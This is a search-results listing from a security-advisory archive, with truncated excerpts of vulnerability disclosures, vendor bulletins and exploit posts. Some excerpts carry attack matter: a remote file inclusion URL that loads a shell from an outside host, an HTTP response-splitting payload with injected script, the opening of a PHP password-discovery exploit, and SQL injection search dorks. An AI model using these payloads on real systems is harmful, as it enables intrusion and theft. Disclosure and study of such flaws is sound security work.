47153 matches found
Gstebuch Version 1.5 Remote Command Execution Vulnerability
Gastebuch Version 1.5 Remote Command Execution Vulnerability ----------------------------------------------------------------------- Script : Gastebuch Version Version : 1.5 Site : http://www.mapos-scripts.de/downloads.php?download=11 Founder : Rizgar Contact : [email protected] and...
netbingo v 2000 >> RFI
name & version :netbingo & 2000 vendor: http://www.proactech.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,farzad exploit :http://victim/bingoserver.php3?responsedir=http://shell...
FloweRS v2.0 Cross Site Scripting
""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ Security Vulnerability Resear...
Weaknesses in Pingback Design
Advisory: Weaknesses in Pingback Design Advisory ID: 4tphi-sa-20070111-pingback Release Date: 01-24-2007 Author: Blake Matheny [email protected] Software: Multiple Impact: Remote DoS Overview: From Wikipedia, "A Pingback is one of three types of Linkbacks, methods for Web authors to request...
Oracle Portal 10g HTTP Response Splitting
Oracle Portal/Applications HTTP Response Splitting -------------------------------------------------- Sample: http://target/webapp/jsp/calendar.jsp?enc=iso-8859-10d0aContent-length=120d0a0d0a3Cscript3Ealert'hi'3C/script3E How an attack can be conducted? ------------------------------- Oracle Port...
Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit
============================================================================================== Kietu? = v4.0.0b2z urlhit Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Download from :...
Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
============================================================================================== Signkorn Guestbook = v1.3 dirpath Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
PHP5 Globals Vulnerability: with ?GLOBALS[foobar] you can set the value of the un-initialized $foobar variable.
PHP5 Globals Vulnerability: with ?GLOBALSfoobar you can set the value of the un-initialized $foobar variable. PHP5 Globals Vulnerability Name PHP5 Globals Vulnerability Systems Affected PHP5 verified on 5.1.1 and 5.1.2 Severity Critical Vendor www.php.net Advisory...
Multiple applications fd_set structure bitmap array index overflow
Issue: Multiple applications fdset structure bitmap array index overflow Type: remote Date: December, 12 2004 Original URL: http://www.security.nnov.ru/advisiories/sockets.asp Author: 3APA3A URL: http://www.security.nnov.ru/ Affected: gnugk 2.2.0 confirmed, fixed by vendor gnugk is OpenH323...
[SA13031] haserl Manipulation of Critical Environment Variables Vulnerability
TITLE: haserl Manipulation of Critical Environment Variables Vulnerability SECUNIA ADVISORY ID: SA13031 VERIFY ADVISORY: http://secunia.com/advisories/13031/ CRITICAL: Moderately critical IMPACT: Manipulation of data WHERE: From remote SOFTWARE: Haserl 0.x http://secunia.com/product/4191/...
Sun Java System Web Proxy Server buffer overflow
No description provided...
Microsoft Security Bulletin MS03-022: Flaw in ISAPI Extension for Windows Media Services Could Cause Code Execution (Q822343)
-----BEGIN PGP SIGNED MESSAGE----- - - ------------------------------------------------------------------ Title: Flaw in ISAPI Extension for Windows Media Services Could Cause Code Execution 822343 Date: 25 June 2003 Software: Microsoftr Windowsr 2000 Impact: Allow an attacker to execute code of...
Security Advisory: FreeBSD-SA-00:23.ip-options
-----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:23 Security Advisory FreeBSD, Inc. Topic: Remote denial-of-service in IP stack Category: core Module: kernel Announced: 2000-06-19 Affects: FreeBSD systems prior to the...
APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005 OS X Yosemite v10.10.4 and Security Update 2015-005 are now available and address the following: Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to...
[ MDVSA-2015:228 ] nodejs
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2015:228 http://www.mandriva.com/en/support/security/ Package : nodejs Date : May 6, 2015 Affected: Business Server 2.0 Problem Description: Updated nodejs package fixes security vulnerability: It was found that...
ESA-2015-002: Unisphere Central Security Update for Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2015-002: Unisphere Central Security Update for Multiple Vulnerabilities EMC Identifier: ESA-2015-002 CVE Identifier: CVE-2013-1899, CVE-2013-1900, CVE-2013-1901, CVE-2013-1902, CVE-2012-5885, CVE-2011-3389, CVE-2013-1767, CVE-2012-2137,...
[SYSS-2014-011] FancyFon FAMOC - Cross-Site Scripting
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2014-011 Products: FAMOC Vendor: FancyFon Affected Versions: 3.16.5 Tested Versions: 3.16.5 Vulnerability Type: Cross-Site Scripting CWE-79 Risk Level: Medium Solution Status: Fixed Vendor Notification: 2014-12-19 Solution Date:...
[SYSS-2014-010] FancyFon FAMOC - SQL Injection
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2014-010 Products: FAMOC Vendor: FancyFon Affected Versions: 3.16.5 Tested Versions: 3.16.5 Vulnerability Type: SQL Injection CWE-89 Risk Level: High Solution Status: Fixed Vendor Notification: 2014-12-19 Solution Date: 2015-01-23...
VUPEN Security Research - Microsoft Internet Explorer CSS @import Memory Corruption (Pwn2Own 2014)
VUPEN Security Research - Microsoft Internet Explorer CSS @import Memory Corruption Pwn2Own 2014 Website : http://www.vupen.com Twitter : http://twitter.com/vupen I. BACKGROUND --------------------- "Microsoft Internet Explorer is a web browser developed by Microsoft and included as part of the...
[USN-2120-1] PostgreSQL vulnerabilities
========================================================================== Ubuntu Security Notice USN-2120-1 February 24, 2014 postgresql-8.4, postgresql-9.1 vulnerabilities ========================================================================== A security issue affects these releases of Ubunt...
Advisory 01/2013: PHP openssl_x509_parse() Memory Corruption Vulnerability
SektionEins GmbH www.sektioneins.de -= Security Advisory =- Advisory: PHP opensslx509parse Memory Corruption Vulnerability Release Date: 2013/12/13 Last Modified: 2013/12/13 Author: Stefan Esser stefan.esseratsektioneins.de Application: PHP 4.0.6 - PHP 4.4.9 PHP 5.0.x PHP 5.1.x PHP 5.2.x PHP 5.3....
[ MDVSA-2013:298 ] php
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2013:298 http://www.mandriva.com/en/support/security/ Package : php Date : December 20, 2013 Affected: Enterprise Server 5.0 Problem Description: A vulnerability has been discovered and corrected in php: The...
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
Memory corruptions, buffer overflows, crossite data access, crossite scripting, information spoofing, privilege escalation, protection bypass, code execution, information leakage...
Re: [ MDVSA-2013:195 ] php
Hey guys, Related to this I?ve found a proof of concept test script: php -r 'xmlparseintostructxml parsercreatens, strrepeat"blah", 1000, $b;' Gabe twitter: @gmaggiotti On Mon, Jul 15, 2013 at 3:41 AM, [email protected] wrote: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux...
[waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7
waraxe-2013-SA102 - Reflected XSS in phpMyAdmin 3.5.7 =============================================================================== Author: Janek Vind "waraxe" Date: 09. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-102.html Description of vulnerable software: phpMyAdmi...
Varnish 2.1.5 DoS in fetch_straight() while parsing Content-Length header
fetchstraight | uintmaxtcl == cll Authors: 22733db72ab3ed94b5f8a1ffcde850251fe6f466 c8e74ebd8392fda4788179f9a02bb49337638e7b AKAT-1 Versions: 2.1.5 Summary It is possible to crash via assert varnish child processes by sending invalid Content-Length reponse header. Panic message: Assert error in...
ESA-2012-052 RSA NetWitness Informer Cross-Site Request Forgery and Click-jacking Vulnerabilities
ESA-2012-052.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-052: RSA NetWitness Informer Cross-Site Request Forgery and Click-jacking Vulnerabilities EMC Identifier: ESA-2012-052 CVE Identifier: CVE-2012-4608 CVE Identifier: CVE-2012-4609 Severity Rating: CVSS v2 Base Score: 6. 8...
CVE-2012-3546 Apache Tomcat Bypass of security constraints
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2012-3546 Apache Tomcat Bypass of security constraints Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.29 - - Tomcat 6.0.0 to 6.0.35 Earlier unsupported versions may also be affected Descriptio...
Exploit - EasyITSP by Lemens Telephone Systems 2.0.2
?php errorreporting0; $arguments = getopt"a:b:c:"; $url = $arguments'a'; $idpod =$arguments'b'; $idend =$arguments'c'; ifcount$arguments!=3 echo ' Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 '."n"; echo ' Discovery users with passwords '."n"; echo ' '."n"; echo ' Author: Michal Blaszczak...
ZDI-11-305 : Oracle Java Applet Rhino Script Engine Remote Code Execution Vulnerability
ZDI-11-305 : Oracle Java Applet Rhino Script Engine Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-305 October 26, 2011 -- CVE ID: CVE-2011-3544 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Java Runtime --...
ZDI-11-306 : Oracle Java IIOP Deserialization Type Confusion Remote Code Execution Vulnerability
ZDI-11-306 : Oracle Java IIOP Deserialization Type Confusion Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-306 October 26, 2011 -- CVE ID: CVE-2011-3521 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Java...
bizConsulting (prodotto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability bizConsulting prodotto.php?id AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.bizconsulting.it/ Persian Gulf 4 Ever! Dork : "Powered by: bizConsulting"...
Mambo CMS 4.6.x (4.6.5) | SQL Injection
Mambo CMS 4.6.x 4.6.5 | SQL Injection 1. OVERVIEW Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection. 2. BACKGROUND Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used...
[USN-1137-1] Eucalyptus vulnerability
========================================================================== Ubuntu Security Notice USN-1137-1 May 26, 2011 eucalyptus, rampart vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its...
Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multiple Vendors libc/glob GLOBBRACE|GLOBLIMIT memory exhaustion Author: Maksymilian Arciemowicz http://netbsd.org/donations/ http://securityreason.com/ http://cxib.net/ Date: - Dis.: 19.01.2011 - Pub.: 02.05.2011 CVE: CVE-2011-0418 Affected Software...
[DCA-2011-0006] Hiawatha 7.4 - Denial-of-Service
Discussion - DcLabs Security Research Group advises about the following vulnerabilityies: Software - Hiawatha WebServer 7.4 Vendor Product Description - Hiawatha is an open source webserver with a focus on security. I started Hiawatha in January 2002. Before that time, I had used several...
HTB22856: XSS vulnerability in Pragyan CMS
Vulnerability ID: HTB22856 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinpragyancms1.html Product: Pragyan CMS Vendor: Pragyan Team http://sourceforge.net/projects/pragyan/ Vulnerable Version: v.3.0 beta Vendor Notification: 17 February 2011 Vulnerability Type: Stored XSS Cross Sit...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0
waraxe-2010-SA078 - Multiple Vulnerabilities in CruxCMS 3.0.0 =============================================================================== Author: Janek Vind "waraxe" Date: 27. December 2010 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-78.html Affected Software: CruxCMS is a...
[USN-989-1] PHP vulnerabilities
=========================================================== Ubuntu Security Notice USN-989-1 September 20, 2010 php5 vulnerabilities CVE-2010-0397, CVE-2010-1128, CVE-2010-1129, CVE-2010-1130, CVE-2010-1866, CVE-2010-1868, CVE-2010-1917, CVE-2010-2094, CVE-2010-2225, CVE-2010-2531, CVE-2010-2950,...
Secunia Research: Pulse CMS Arbitrary File Upload Vulnerability
====================================================================== Secunia Research 08/04/2010 - Pulse CMS Arbitrary File Upload Vulnerability - ====================================================================== Table of Contents Affected...
Code to mitigate IE event zero-day (CVE-2010-0249)
Here's a mitigation for the CVE-2010-0249 IE createEventObject srcElement zero-day. Quite simply, it just disables the createEventObject method by mangling its name in memory. If anyone knows an important web application that uses createEventObject, please respond to the mailing list. Use this co...
0day vulnerability Sogou input method to obtain system privileges
0day vulnerability Sogou input method to obtain system privileges Vulnerability: Do not intend to found a very serious vulnerability, and the year 3389 input loophole similar.However, no system was not being loaded does not affect input method logged in system. If the remote server installed ,...
Oracle exploit for CTXSYS.DRVXTABC.CREATE_TABLES and others
Hi! I've just released the working exploit for CTXSYS.DRVXTABC.CREATETABLES injection on Oracle DB 9i/10g CVE-2009-1991 You can find the code on my site, http://rawlab.mindcreations.com In particular, Classic SQL injection:...
Oracle CPUjul2009
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi. Information about four vulnerabilities patched in Oracle CPUjul2009: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html ... is published at: CVE-2009-1970: http://blogs.conus.info/node/26 CVE-2009-1963...
Microsoft Security Bulletin MS09-026 - Important Vulnerability in RPC Could Allow Elevation of Privilege (970238)
Microsoft Security Bulletin MS09-026 - Important Vulnerability in RPC Could Allow Elevation of Privilege 970238 Published: June 9, 2009 Version: 1.0 General Information Executive Summary This security update resolves a publicly disclosed vulnerability in the Windows remote procedure call RPC...
About the security content of Security Update 2008-008 / Mac OS X v10.5.6
About the security content of Security Update 2008-008 / Mac OS X v10.5.6 Last Modified: December 15, 2008 Article: HT3338 Summary This document describes the security content of Security Update 2008-008 / Mac OS X v10.5.6, which can be downloaded and installed via Software Update preferences, or...
Aria-Security.com: Saba 2.0 Cross Site Scripting [PASSIVE]
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability PHP-Nuke 8.1 Module BookCatalog category&catid AuTh0r : EhsanHp200 H0ME : www.only-4dl.tk Email : [email protected] Persian Gulf 4 Ever! Dork : "inurl:modules.php?name=BookCatalog" Exploite for username:...
iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Multiple Command Injection Vulnerabilities
iDefense Security Advisory 06.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 03, 2008 I. BACKGROUND Sun Java System Active Server Pages is a multi-platform ASP application server. It provides provides ASP Active Server Pages functionality to a web server. More information is...
iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Authorization Bypass Vulnerability
iDefense Security Advisory 06.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 03, 2008 I. BACKGROUND Sun Java System Active Server Pages is a multi-platform ASP application server. It provides provides ASP Active Server Pages functionality to a web server. More information is...